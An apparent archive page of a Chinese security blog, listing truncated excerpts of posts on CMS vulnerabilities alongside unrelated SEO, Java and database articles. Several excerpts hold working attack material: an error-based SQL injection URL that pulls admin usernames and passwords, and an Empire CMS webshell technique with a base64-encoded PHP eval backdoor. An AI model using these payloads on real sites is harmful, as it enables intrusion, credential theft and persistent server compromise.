渗透测试 科普专线

0
一、前言 半个月前, @Tater 发了一个《透过[新浪微博]官方来源调用API发表微博.无需client_sec》(http://www.wooyun.org/bugs/wooyun-2010-011314 ),但是对于其中涉及的OAuth 2.0的缺陷语焉不详。这几天趁着另一个项目的迁移机会对其它国内支持OAuth 2.0开放平台进行了相关测试,遂有此文。为了各位翻阅相关文档方便,部分英文词汇仅作注释。 二、OAuth 1.0:app secret不能泄露 OAuth 1.0的设计偏......

实用工具

360Shop网店系统多个漏洞(含getshell)

发表于5年前 | 作者: seay

0
360Shop网店系统多个漏洞,部分漏洞可getshell。 详细说明:官网:http://www.360shop.com.cn 测试基于360Shop最新版本V3.0 使用这套系统的有独立的站点,如 http://www.iplaybox.net http://www.lpxxw.net 也有托管给官方的网店,这个比较多,可能有几千个,如: http://09pf.taodiantong.com http://520mpai.taodiantong.com 1. SQL注入 测试地址: http://www.iplaybox.net/?do=display&mod=good......

实用工具

0
齐博cms整站系统(原PHP168)配置不当导致任意用户登陆,比如cms管理员等。 详细说明:还是由于UC_CENTER的问题,之前闹过UC_KEY变量为空时可以调用UC_CENTER中的相关用户API直接进行操作,今天下了一份V7版本的源码,在uc_config.php中发现UC_KEY被初始化了 define(‘UC_DBCONNECT’, ‘0’); define(‘UC_KEY’, ‘fdsafd43’); //这里做了初始化 define(......

实用工具

Tipask!2.0、1.4sql注入及修复

发表于5年前 | 作者: seay

0
之前也有人爆wps的sql注入,其实wps用的是这个系统 详细说明:在control/question.php 的onajaxsearch函数中 function onajaxsearch() { $title = urldecode($this-> get[2]); $questionlist = $_ENV[ ‘question’]->search_title($title, 2, 1, 0, 5); include template(‘ajaxsearch’ ); } 由get[2]传入的参数经过了urldecode再进入到question模块中的search_title函数里......

代码审计 实用工具

12
博客www.cnseay.com刚换域名不久,需要点原创文章。。。蛋疼找了几套CMS玩玩。。。以前个别程序挖的洞提交到官方,有的爱理不理的,搞得都不想提醒官方了….礼物什么不说了,起码说个谢谢嘛。。。不废话了。。。 官网找了个简单介绍: MetInfo企业网站管理系统采用PHP+Mysql架构,全站内置了SEO搜索引擎优化机制,支持用户自定义界面语言(全球各种语言),拥有企业网站常用的模块功能(企业简介模......

编程开发

php安全开发文件包含漏洞的避免小技巧

发表于5年前 | 作者: seay

2
现在程序代码写的越来越千奇百怪,就一种文件包含的代码就能写出2种:require include 先说require 如果出错则终止输出,include 如果出错则继续执行。 如果一个网站的管理用户写在auth.php里,且auth.php被恶意删除了,如果用require则没有漏洞。 如果用include则产生漏洞,这是为什么?因为Include在遇到错误时会继续执行,这样用户密码就为空,就进入了后台。 再如果 一个网站 查看一条公告是链接式in......

渗透测试

被K的域名如何再次焕发生机 重新收录

发表于5年前 | 作者: seay

0
K站在站长的生活中,总是免不了的,特别是新站,更新不及时或者采集等有一点百度不满意的地方就有可能被K掉,从而让网站遭受很大的损失。 一般来说网站被K了之后,努力的修改内容,查找被K的原因,是大多数站长要做的,虽然我也这么做,但是其实恢复的可能性还是很小的,即使每每天一次提交域名给百度,修改SEO,删除垃圾外链等等工作都做的差不多了,但是依然还是有可能被百度所放弃,那么如何让被K的......

编程开发

0
Java就是用来做项目的!Java的主要应用领域就是企业级的项目开发!要想从事企业级的项目开发,你必须掌握如下要点:   1、掌握项目开发的基本步骤   2、具备极强的面向对象的分析与设计技巧   3、掌握用例驱动、以架构为核心的主流开发方法   没有人愿意自己一辈子就满足于掌握了一些代码实现的技巧,别人告诉你要实现什么,你就用代码堆砌来实现别人的要求!你必须学会从整个项目的角度去思考......

编程开发

Oracle 与 MySQL 的区别

发表于5年前 | 作者: seay

0
1、在ORACLE中用select * from all_users显示所有的用户,而在MYSQL中显示所有数据库的命令是show databases。对于我的理解,ORACLE项目来说一个项目就应该有一个用户和其对应的表空间,而MYSQL项目中也应该有个用户和一个库。在ORACLE(db2也一样)中表空间是文件系统中的物理容器的逻辑表示,视图、触发器和存储过程也可以保存在表空间中。而MYSQL并没有使用表空间来进行管理。   2、查询当前所有的......

实用工具

0
把select关键字改成SEleCt 语句如下 /api/datacall.php?type=user&by=and%201=1&limit=1&order=1 and(sEleCt 1 from(sEleCt count(*),concat((sEleCt (sEleCt (sEleCt concat(0×27,0x7e,pd_users.username,0×27,0x7e,pd_users.password,0×27,0x7e) from pd_users where userid=1 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables......

编程开发

3
看图,不解释,放出源码如果心是近的,再远的距离也是近的源码修改的时候留个版权哇

渗透测试

帝国cms 6.6最新版本后台拿webshell方法

发表于5年前 | 作者: seay

0
不知道别人有没有发过。反正我昨天搞个站自己发现的。必须分享出来!! 由于我日的那个站是帝国cms 6.6最新版本的,所以网上找了一些方法都失效了! 自定义页面-增加自定义页面-随便写了xxx.php文件名,页面内容填写,<script language=”php”>echo base64_decode(“PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=”);</script> 如果内容直接添一句话或者php大马是无用的......

人文创业

2
损人损己的软件测试 某前辈的经历教你跟开发人员沟通 (损人损己)做代码质量检查差事最易得罪人,大多是为公司干好事给自己树敌的差事   我总想把代码写好,结果:   1:自己创业时,看不惯同事写得代码质量不好,性能不高,复用程度低,挨个检查挨个批评,结果把所有的人都得罪光了,人都被挖走了。   2:在宁波打工,检查同事的代码,说人家这里不好哪里不好,结果把资深的同事都给得罪了,有......

代码审计

0
核心摘要:在法庭上,360的律师承认,360用hook黑客技术替换了QQ安全中心。 9月18日下午,腾讯诉奇虎360不正当竞争一案继续在广东高院开庭审理。腾讯向360索赔1.25亿元。 下午的庭审从3点半开始,到5点半结束,持续了大约2个小时。经过数轮法庭调查与辩论后,审判长宣布休庭,未定未来何时再开庭。 搭便车 360推出扣扣保镖后,点击QQ软件的安全中心,进去的却是360安全卫士的页面。腾讯由此认为360存在......